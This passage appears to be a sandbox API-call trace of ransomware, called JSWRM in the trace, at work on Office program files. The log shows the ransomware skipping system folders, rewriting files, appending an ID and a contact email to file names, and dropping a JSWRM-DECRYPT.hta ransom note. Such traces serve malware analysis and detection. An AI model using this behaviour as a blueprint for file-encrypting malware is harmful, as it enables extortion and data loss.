lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0101.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.434] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=104296) returned 1 [0101.434] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19760) returned 0x24d210 [0101.434] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x19760, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x19760, lpOverlapped=0x0) returned 1 [0101.445] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.445] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x19760, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x19760, lpOverlapped=0x0) returned 1 [0101.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.446] CloseHandle (hObject=0x45c) returned 1 [0101.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0101.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0101.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0101.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0101.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0101.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.446] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8.mp4"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8.mp4.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8.mp4.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0101.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0101.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0101.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0101.447] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x115b4243, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115b4243, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115b4243, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a00, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win8_RTL.mp4", cAlternateFileName="STARTM~3.MP4")) returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2=".") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="..") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="...") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="windows") returned -1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="recovery") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="perflogs") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="documents and settings") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="$RECYCLE.BIN") returned 1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="system volume information") returned -1 [0101.447] lstrcmpiW (lpString1="StartMenu_Win8_RTL.mp4", lpString2="msocache") returned 1 [0101.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8_RTL.mp4", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8_RTL.mp4", cchWideChar=22, lpMultiByteStr=0x240f70, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win8_RTL.mp4", lpUsedDefaultChar=0x0) returned 22 [0101.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8_RTL.mp4", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0101.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win8_RTL.mp4", cchWideChar=22, lpMultiByteStr=0x241308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win8_RTL.mp4", lpUsedDefaultChar=0x0) returned 22 [0101.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0101.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0101.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0101.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8_RTL.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8_rtl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.448] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=104960) returned 1 [0101.448] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19a00) returned 0x24d210 [0101.448] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x19a00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x19a00, lpOverlapped=0x0) returned 1 [0101.463] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.463] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x19a00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x19a00, lpOverlapped=0x0) returned 1 [0101.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.464] CloseHandle (hObject=0x45c) returned 1 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0101.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0101.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0101.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0101.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8_RTL.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8_rtl.mp4"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8_RTL.mp4.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8_rtl.mp4.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0101.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0101.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0101.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.465] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x115b4243, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115b4243, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115b4243, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a00, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win8_RTL.mp4", cAlternateFileName="STARTM~3.MP4")) returned 0 [0101.466] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0101.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0101.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0101.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0101.466] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2=".") returned 1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="..") returned 1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="...") returned 1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="windows") returned -1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="recovery") returned -1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="perflogs") returned -1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="documents and settings") returned 1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="$RECYCLE.BIN") returned 1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="system volume information") returned -1 [0101.466] lstrcmpiW (lpString1="Integration", lpString2="msocache") returned -1 [0101.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0101.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0101.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0101.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0101.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bce0 [0101.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0101.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\integration\\jswrm-decrypt.hta")) returned 0xffffffff [0101.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0101.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0101.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0101.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0101.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0101.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0101.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b510 [0101.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0101.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\integration\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.471] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.471] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0101.472] CloseHandle (hObject=0x458) returned 1 [0101.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0101.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0101.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0101.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0101.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0101.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0101.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bda8 [0101.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0101.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\integration\\jswrm-decrypt.hta")) returned 0x20 [0101.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0101.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0101.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0101.472] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x33234999, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0101.475] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0101.475] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x33234999, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0101.476] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0101.476] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0101.476] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe33a4c67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe33a4c67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3607185, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc61000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RInt.16.msi", cAlternateFileName="C2RINT~1.MSI")) returned 1 [0101.476] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2=".") returned 1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="..") returned 1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="...") returned 1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="windows") returned -1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="recovery") returned -1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="perflogs") returned -1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="documents and settings") returned -1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="$RECYCLE.BIN") returned 1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="system volume information") returned -1 [0101.477] lstrcmpiW (lpString1="C2RInt.16.msi", lpString2="msocache") returned -1 [0101.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0101.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RInt.16.msi", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RInt.16.msi", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RInt.16.msi", lpUsedDefaultChar=0x0) returned 13 [0101.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RInt.16.msi", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RInt.16.msi", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RInt.16.msi", lpUsedDefaultChar=0x0) returned 13 [0101.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0101.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0101.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0101.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RInt.16.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rint.16.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.478] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=12980224) returned 1 [0101.478] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.478] RtlAllocateHeap 